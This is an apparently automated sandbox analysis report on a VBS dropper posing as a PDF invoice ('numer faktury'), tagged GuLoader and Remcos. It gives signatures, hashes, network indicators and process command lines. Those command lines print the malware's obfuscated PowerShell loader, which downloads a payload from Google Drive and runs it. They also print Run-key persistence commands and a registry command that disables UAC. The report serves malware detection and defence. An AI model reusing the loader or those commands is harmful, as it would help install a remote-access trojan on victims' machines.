Malware Analysis Report

2025-01-02 03:20

Sample ID 240402-qphszabc6z
Target numer faktury_505603890324·pdf.vbs
SHA256 fe7ff83680ff3855e060227bddf560db0fe75b141db516320674dace99202224
Tags
guloader remcos remotehost downloader persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fe7ff83680ff3855e060227bddf560db0fe75b141db516320674dace99202224

Threat Level: Known bad

The file numer faktury_505603890324·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

guloader remcos remotehost downloader persistence rat

Remcos

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

Program crash

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 13:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 13:26

Reported

2024-04-02 13:28

Platform

win7-20240221-en

Max time kernel

61s

Max time network

132s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\numer faktury_505603890324·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Remcos

rat remcos

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tetrachromatic = "%Industrialiseres50% -w 1 $Cigarfring=(Get-ItemProperty -Path 'HKCU:\\Pectized\\').Syntakstegns;%Industrialiseres50% ($Cigarfring)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1808 wrote to memory of 2892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1808 wrote to memory of 2892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1808 wrote to memory of 2892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2892 wrote to memory of 1108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2892 wrote to memory of 1108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2892 wrote to memory of 1108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2892 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2892 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2892 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2892 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 2208 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2208 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2208 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2208 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2976 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2976 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2976 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1744 wrote to memory of 2140 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2140 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2140 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2140 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\numer faktury_505603890324·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tetrachromatic" /t REG_EXPAND_SZ /d "%Industrialiseres50% -w 1 $Cigarfring=(Get-ItemProperty -Path 'HKCU:\Pectized\').Syntakstegns;%Industrialiseres50% ($Cigarfring)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tetrachromatic" /t REG_EXPAND_SZ /d "%Industrialiseres50% -w 1 $Cigarfring=(Get-ItemProperty -Path 'HKCU:\Pectized\').Syntakstegns;%Industrialiseres50% ($Cigarfring)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\ProgramData\Remcos\remcos.exe

"C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.39.97:443 drive.usercontent.google.com tcp
GB 142.250.187.206:443 drive.google.com tcp
NL 142.251.39.97:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 e5360b80e5ad014472ba4b907fb36e79
SHA1 ac0f4c89649ffd2f6f436c47a4e0dadd9244e812
SHA256 4ba1176eb662a70d6b63a0f2dd0530e310cd3bc30eb9e90d53609e6689088b0b
SHA512 b42164e738b87cad6ef337f9081313cd366a958a7733c52f516a2b6c184c0aa39c0cf1b9f2c37a2d9ad1fd088fe3573d56985b4b8d1ad39817cf3d0df2cb44cd

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 a72f144772db859658fa4bb27cc936da
SHA1 143ad7783080fc3ca4be706d151b07c2f461029f
SHA256 0b1f4458c75c032ce274ecc900b56c41abf4a5811fe2cddede96efd3fd503fdc
SHA512 3e9eef7eeeffcaf4ef7b064fdb783e2ee940c41e4454d54cd74d9f2dc94355163304bc282a54a93a36a3692f08c99b91c2bd2ba093cdd3f895907b85aea0e970

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 832c41fd1505c74d7c41e1c57ec0562c
SHA1 69940e96d42a950d5453eed27ce554a5651ca5fa
SHA256 4033c0fc7d710e05edb7cc24a63d1c37443c6d181203c895a4d7438a2259e9b3
SHA512 9715c92293738222c502d42416b4a1892b55bf49eb467c59c947f5bb8037b2abfc9240dfde7042f12f2d133a5f2ec324e83bc1813405b528d6bdf7b3ca63c2a4

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 c132ead93dd767c6f441efc59786eb6c
SHA1 7d35d3ed07d81c00bdc965a23b7a587a4285d818
SHA256 a5e18065666df9865e94c3f20e3657b0224912d9d877e8564ee99eef4a67844b
SHA512 de5f572665f07a30d2f2371cff8e4960440e16e91a00c6d90e3ef2be9865b793d4fa4370be86b9ad072b725d1302ecb9fa490720d81188246f86792f9096af9e

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 eef15c25b6f384e6ab7f1f306f5d0e07
SHA1 4b3b0a4fdcbea1e6e9163db27955d2a3f9af43b0
SHA256 57501d3926ec5ef84ef528b1e8ff1bc0adc9fef9eb10d88bea9d92432f0854c9
SHA512 fe7f57260ea9b8d0e8f42b02caeb44ca6146350362739d03ba2ae7c3c79322e6a33c334aa17464892f59614a43eba152551ebe426d43fae4002337c116bc5120

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NY6CI6HC1MK7T0ID6OPV.temp

MD5 2569a0d7d50631400cfbcc473943cea3
SHA1 54f7618e2bb9d766396e994e069e8e07b3a332b3
SHA256 f8ec181160dddf37dd00450222f0d4aafb3c308d59038775201d7e3485fd0cf7
SHA512 55d787ca72024f905b4c3a16d6c85a1196e7448de8febbb5a64f0ce89a669897696cdb87c231665d27c9f38b054ae486467a825cf453ad2d6540ef5f5332d675

C:\Users\Admin\AppData\Local\Temp\CabCCC1.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6dcd1f6b6e5307f02a10bdc5d3dd6125
SHA1 1c90b82b1ba083a524e2031aeb15650c2cb9e5f5
SHA256 adcc8a43caaf47562a3fa5bbd0f58616d5fb2c65359111388dba1f81b48947b7
SHA512 99a5fc88367529cb47f82913d0df75e3ba7612e509c57a9f5776ffcd4de3a9bcb79e348ac224ebce9c06e7cc74b0424c19208eac791b9cae7b1519be1288dcf8

C:\ProgramData\Remcos\remcos.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-02 13:26

Reported

2024-04-02 13:28

Platform

win10v2004-20240226-en

Max time kernel

93s

Max time network

117s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\numer faktury_505603890324·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\numer faktury_505603890324·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

LedelskDisk,tes .imulatDebatari Svampel BenediaStatskir A,golab ThisteeBoghvedjKreatiodLbetid eAnretnirKunstaksPolarog ');Chivvy (Bundteksters 'Spidska$k.ybbesgExplicali,citamo sammenbNullabla Husgerlbrinnyu:genotypb Plea.ae Con.enaDataopsu hin.ndmDrablyhoSknaandnIndt end Seetu.eAffatn, Blodba= Feltst Sovepil[BadevanSBud.etryAgrologsSnaps.ct Outbegetvelyd,m Afbeny.immunogCSlovenvoLate,tsnAfsp jlvPailsfueUnc.nnirRegionstFrstest]Flymeka: For ry: SerigrF GremaarOverhatoForcedsmSheafliB SateliaFlelseosUmuliggearts av6Apotele4Ufor.taSForkorttSkibstirHimm,lsiPrededinspygatmgAnastaz(.ikkerh$ PostmaHBeliggeeHoora enValgkonvBlokadeiI ternasMycetopnEmuersaiWondersn Efte lgAccolademedillenTngerne)Forfje, ');Chivvy (Bundteksters 'C,ocody$Nonri.agUnhandcl AfstbnofishboabMarnispaDeedinelCar.occ: NonfacUmindstenFiskerldarisinge.earninrVrd.ersf NstsvgoBirgittrMyosenhsS,bpacktSweetmeaSolutisaStil,ele Fa,ternEtherifd BegyndeStasisf Autofun=tilbage Charmer[C,lpurnSTelefony Be igtsP rietotForsmdee UglifimKob.erv.Barre,mT Udtrknebredygtx Secedet edirig.Exs uitENonwaivn rrivicC,icketoTickprod Electri GrsrodnDagpr.ggMusikra]termitb:Lugter.:CytosinApho,ocaSAltertaCLithopaIPhleba.ICu heab.AntinarGUtopiene oedelatAdfrd mSOve apptKas,emarNedkleniEmport nBar.ategUndersp(Un,ergo$Sta.islbbede,ageIndstniageron ouNonthinmWeddingoSpaniolnChilliedLaareneePing.in)Ph haly ');Chivvy (Bundteksters 'Dislik $KonverggVe,erinlAmtsboroDemontebThermoma BrstfllAfloese:.erraseDMaskinfr LineaeiVaabenlnInspisskThermoma entepebhabi iml WithgaeDefibrisVaginol=Indfrsl$PlagionUGruffien.hermotdClockcyeEmbryomrSupe.smfEksisteotrlkvinrBaadebrsMist lktFarmerea ,nformaAfryddee XylosinD.wnloadPlato,iem skinp.Th,ologsSkalksbu OverskbHgessoes ykkenftPartis.r PresswiOverflynsalooneg Thirty(Fost.rh3Appeten1 Veksli1.ienden2Con,ent2,dstopp3Rapunse,arom.tr3Cro,set1Forlibt3Unthi.k6S ralde7Chu chi)Svrmern ');Chivvy $Drinkables;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Phenaceturic Betingelsesdel Biblioteksudlaanet Reshipments Eddikens Betsileos Manuma #>;$Peasantries=(cmd /c set /A 115^^0);Function Bundteksters ([String]$Exon){$Klimatologs=8;$Kemibgernsalivation=Volcano($Exon);For($Kemibger=7; $Kemibger -lt $Kemibgernsalivation; $Kemibger+=$Klimatologs){$Sidetallerkeners=$Exon.$Knapper.Invoke($Kemibger, 1);$Flatterers=$Flatterers+$Sidetallerkeners;}$Flatterers;}function Chivvy ($Tic){. ($melopoeic) ($Tic);}function Volcano ([String]$Ernringsfysiologerne){$Kimendes=$Ernringsfysiologerne.Length-1;$Kimendes;}$Peasantries=[char][int]$Peasantries;$Knapper=$Peasantries+'ubstring';$Skamrdmen=Bundteksters 'Organ,sTDisg.orrMerrymeaNonext,n Fluttesk.skadefCibo,sdeSkafninrVibraphrNsvisreiMatrikenCapillagUn ergr ';$Lazarist=Bundteksters 'UnclimbhNedgan,tHorsetotV,ldelipRettelss Notere:Skulk,n/ Autori/ClimactdCivi,isrLnindtgiHemiphrv Forli.eMotorbr.FortllegUdkonkuoCurvogroFugaci,g Af alklpeckingeSausage.Mi htescEgest,ooAmoknurmNegle.e/Proterouspine,ecOmbest.? 
EdnasceTrianguxSkulderpGlossapoboulevarBerettetSeletfa=.undevedInsug,nofondshaw Epita n oldninlv rdenso IrenesaScupperd La,oni& FritstiSt reomdBraciol=Rosenst1fors.ar7IndkomsE lederen Hainan3 solsortBjesstiBKies.elDParcookJHa,ideseG.ugeab6 FascinwRoentg VunavngiWAerifyiLRemanurbColdhearTofrontMdubleriBPhylloc2As.ylar3NedgrelHTowngatOGarb espcoloquipAstroma7underlgXIrrepeaU fbalanT H.ndreWRa etskdStoresl2Ph.ladiDDomflde ';$melopoeic=Bundteksters 'JournaliFil.ngieProwedaxUn.eare ';$fircylindrets=Bundteksters 'Xylocar$ VinlvmgDinornilScrofulolotteribbookboaaEuxe.itl Sc ewd:Stjert TunionisiThumbikl CrematsPrahmriaBandagenSpringedRegnefue Sekaned.ncowlme Un,urr Benigna=poles i GazomeS SuperitSigteliaRecirkurBe.wepttLeall.a-StvdragB HooteriP,ineuntUdbedrisUdaandeTOutplacrBibrin.a orskern SygneisNae.oidfAnkomneedipla,trBl.bber Rat.ish-ServobrS Cirkulo orskefuRegnvanrSaltlagcInt rmieStatspa Folkesk$UnderfaL KbenhaaFodboldz upersea TidnderGastroci JeaabnsVerdenstBo.sted Tropehj-Su,qualDNoncompeDisket.s,ydrocltUncongristuntmen I.islea Quarr tSensi aiSterlino St,imlnTropist Affolke$ AlcohoTH ltesaeOv.rrankIncarcesKisterstDoegngeiNonpunglC cilieaNetasderSelvantbFi,kedaeMadrigajSygeford BrugereErtholmrK ffrarsHagende ';Chivvy (Bundteksters 'Hundepi$ constig,erciallMis gynoRepentabWholelyaunmystilCaptans:SemiparTVandbadeStilisekBjer.stsFl kepotBundg,ritelepatlHydroseaEvoke,srThaneshbReparabeOver.asjFiresafdStartvreDe,kripr,eduktisB.atsch=Prepack$Gwineude Ad arsnHejrensvLystfis:LibelleaEngulfipTi,edespPosthusdhigh eaaBloatsttHemospoaDec bar ') ;Chivvy (Bundteksters 'MarksmaI ViscoumSeedcakpEquisidoWatchedr UdskydtQ oadse-,orgmesMWater eoSourbeldA.gribeuBortfall Rade,be Subtas RejsetiBShadcheiOptje.et Tanglos IndkliTT opophrForvandaoliniaanUnderlisCaninitfKeramike Blikv,r Oligom ') ;$Tekstilarbejders=$Tekstilarbejders+'\Gravrst.Coo' ;Chivvy (Bundteksters ' Heini.$ riegitgandels.l Maale,oAf opnibSl kaspaUnderv,l se icu: bloodiC TronfroChro.atu Slutk nFormndstDargerke Molassr 
EructkiTatarenn.llesfodHep tomeOwertern ExpecttAfsindiaTrebleptSuboptiiSeventyoOutflamn Kabine= iparia( AnecdoT ransmieNinetiesionisert Sukrin-E,iteriPDevolataEftersotFormat h Itam,l Saughen$Modera.T Tran,peSclerodkPlatonisnonvolutIndeholiSygeliglParahy aResundsrC managbDebil teConsentjC.mmododInconcle LignifrDy,frossTheftsr)Urinous ') ;while (-not $Counterindentation) {Chivvy (Bundteksters ' TurbopIbestyrefTeratog .onmanu(Sf,rmid$deenergTandouiliPhysapolPu tiersBlyholdaAftraednAsylst,dudsten.eTetra ydUnch lde Ob.kur.pro lamJSolsk noLif.odsb,erfidiSRollic,tObtenebasmitst.tPoitrineLindrin Rdkaa -BesprizecommunaqStm,ale Windsla$ CyclosSWebst.dkbesindea TelegrmSandvaar Bonmotd,issekkmReballoeVitrasenHjlpe i)Pertain Materia{O,erfreSSvips,ntUngatheavibrat rHermelitTerrito- LoblolSS ifflelmuscicaeBantusteUnen,hrpTraluce Samflel1 Unboun}UnmeltaeH,lesialFlerfamsIn,latoeSkattef{Tag rknSTandstitlovoveraLan,vinr BundfltKontr l-Telfon.SProjicelFr.landeSpecialePolychlpKulturp Transpi1re.sour; WeedieC TeglvrhFagraadiindertrv Somedev NonmonyStorebl Hall c$Autoca f Tred.eiAfbdendrDimittecDagafsnySs,ykkelSemiconiAfgrelsnGastropdCaponi,rTeks beeStukloftBaghaansForslvn}Kogepla ');Chivvy (Bundteksters 'udvikli$R.ducedg,nitterlRotatoroStraffebKystbanaKvaltprlPartici:HyperorCdr aattoS perdeuSwashbun P,eacct Mom.oleprocra rCentriciGendarmnUndef ad CowpieeVa.inaenA thenitY.gnobraMarty,it s.yllei ndtrdeoTimelnsn Cyanop=Me erie(PrluderTIdeentie T.ivlrsZonetertRegneud-TendovaPEvakueraNonseditA,etavlhDisting unfound$VrangmaTGuerr,lebiosyntkNonconcsProstattAdeuismi UniverlSmirks,aIsoproprEndetarbPartsfoeOcean,pjFolkered UnrevoeSomatogr mbassasFjernsy)Chu.kin ') ;}Chivvy (Bundteksters 'Fetolog$Selv,adg E,hanclWinegrooVindingbHu chinaDemissilBekmpel: JdedomH pouseheOprrskfnReinte vdetachriUngradus LumskenBeproseiFrbyvean La.ensgRazer ieFastprin Surre, Borger= Bmpele DukketeGCeromaneCyke.kut Unruin-h,wardsCUtilstroActinomnOpbygintStrandeeRoofersn heautot Ma,pak Galpes$Mi,eogrTDevanage 
LedelskDisk,tes .imulatDebatari Svampel BenediaStatskir A,golab ThisteeBoghvedjKreatiodLbetid eAnretnirKunstaksPolarog ');Chivvy (Bundteksters 'Spidska$k.ybbesgExplicali,citamo sammenbNullabla Husgerlbrinnyu:genotypb Plea.ae Con.enaDataopsu hin.ndmDrablyhoSknaandnIndt end Seetu.eAffatn, Blodba= Feltst Sovepil[BadevanSBud.etryAgrologsSnaps.ct Outbegetvelyd,m Afbeny.immunogCSlovenvoLate,tsnAfsp jlvPailsfueUnc.nnirRegionstFrstest]Flymeka: For ry: SerigrF GremaarOverhatoForcedsmSheafliB SateliaFlelseosUmuliggearts av6Apotele4Ufor.taSForkorttSkibstirHimm,lsiPrededinspygatmgAnastaz(.ikkerh$ PostmaHBeliggeeHoora enValgkonvBlokadeiI ternasMycetopnEmuersaiWondersn Efte lgAccolademedillenTngerne)Forfje, ');Chivvy (Bundteksters 'C,ocody$Nonri.agUnhandcl AfstbnofishboabMarnispaDeedinelCar.occ: NonfacUmindstenFiskerldarisinge.earninrVrd.ersf NstsvgoBirgittrMyosenhsS,bpacktSweetmeaSolutisaStil,ele Fa,ternEtherifd BegyndeStasisf Autofun=tilbage Charmer[C,lpurnSTelefony Be igtsP rietotForsmdee UglifimKob.erv.Barre,mT Udtrknebredygtx Secedet edirig.Exs uitENonwaivn rrivicC,icketoTickprod Electri GrsrodnDagpr.ggMusikra]termitb:Lugter.:CytosinApho,ocaSAltertaCLithopaIPhleba.ICu heab.AntinarGUtopiene oedelatAdfrd mSOve apptKas,emarNedkleniEmport nBar.ategUndersp(Un,ergo$Sta.islbbede,ageIndstniageron ouNonthinmWeddingoSpaniolnChilliedLaareneePing.in)Ph haly ');Chivvy (Bundteksters 'Dislik $KonverggVe,erinlAmtsboroDemontebThermoma BrstfllAfloese:.erraseDMaskinfr LineaeiVaabenlnInspisskThermoma entepebhabi iml WithgaeDefibrisVaginol=Indfrsl$PlagionUGruffien.hermotdClockcyeEmbryomrSupe.smfEksisteotrlkvinrBaadebrsMist lktFarmerea ,nformaAfryddee XylosinD.wnloadPlato,iem skinp.Th,ologsSkalksbu OverskbHgessoes ykkenftPartis.r PresswiOverflynsalooneg Thirty(Fost.rh3Appeten1 Veksli1.ienden2Con,ent2,dstopp3Rapunse,arom.tr3Cro,set1Forlibt3Unthi.k6S ralde7Chu chi)Svrmern ');Chivvy $Drinkables;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2000 -ip 2000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 2488

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
NL 142.250.179.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.39.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 061970f3be09180d9f4da817170240bc
SHA1 e808121ec2a2932eb9521b3bfdcb27b1c4d13a86
SHA256 d65eff1171202c7afe122834b61d11eb7a41edea276398ecb5c7377693856555
SHA512 12a1abf9abf6ced2a33720953688407deb617b7ebe1e8d7158555935c0e1a51ce8e073264a54a2fa6981716d2126cb00d6eb5e754b111c3da33192f4e02b814f

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 c132ead93dd767c6f441efc59786eb6c
SHA1 7d35d3ed07d81c00bdc965a23b7a587a4285d818
SHA256 a5e18065666df9865e94c3f20e3657b0224912d9d877e8564ee99eef4a67844b
SHA512 de5f572665f07a30d2f2371cff8e4960440e16e91a00c6d90e3ef2be9865b793d4fa4370be86b9ad072b725d1302ecb9fa490720d81188246f86792f9096af9e

memory/4756-263-0x000001DF669D0000-0x000001DF669F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5jonlaf.1g0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4756-273-0x00007FFFD8460000-0x00007FFFD8F21000-memory.dmp

memory/4756-275-0x000001DF66A20000-0x000001DF66A30000-memory.dmp

memory/4756-276-0x000001DF68EA0000-0x000001DF68EC6000-memory.dmp

memory/4756-274-0x000001DF66A20000-0x000001DF66A30000-memory.dmp

memory/4756-277-0x000001DF69090000-0x000001DF690A4000-memory.dmp

memory/4756-278-0x000001DF66A20000-0x000001DF66A30000-memory.dmp

memory/2000-282-0x0000000004B00000-0x0000000004B10000-memory.dmp

memory/2000-283-0x0000000005140000-0x0000000005768000-memory.dmp

memory/2000-281-0x0000000004B00000-0x0000000004B10000-memory.dmp

memory/2000-280-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/2000-284-0x00000000050C0000-0x00000000050E2000-memory.dmp

memory/2000-286-0x0000000005850000-0x00000000058B6000-memory.dmp

memory/2000-285-0x00000000057E0000-0x0000000005846000-memory.dmp

memory/2000-279-0x0000000004A00000-0x0000000004A36000-memory.dmp

memory/2000-296-0x0000000005940000-0x0000000005C94000-memory.dmp

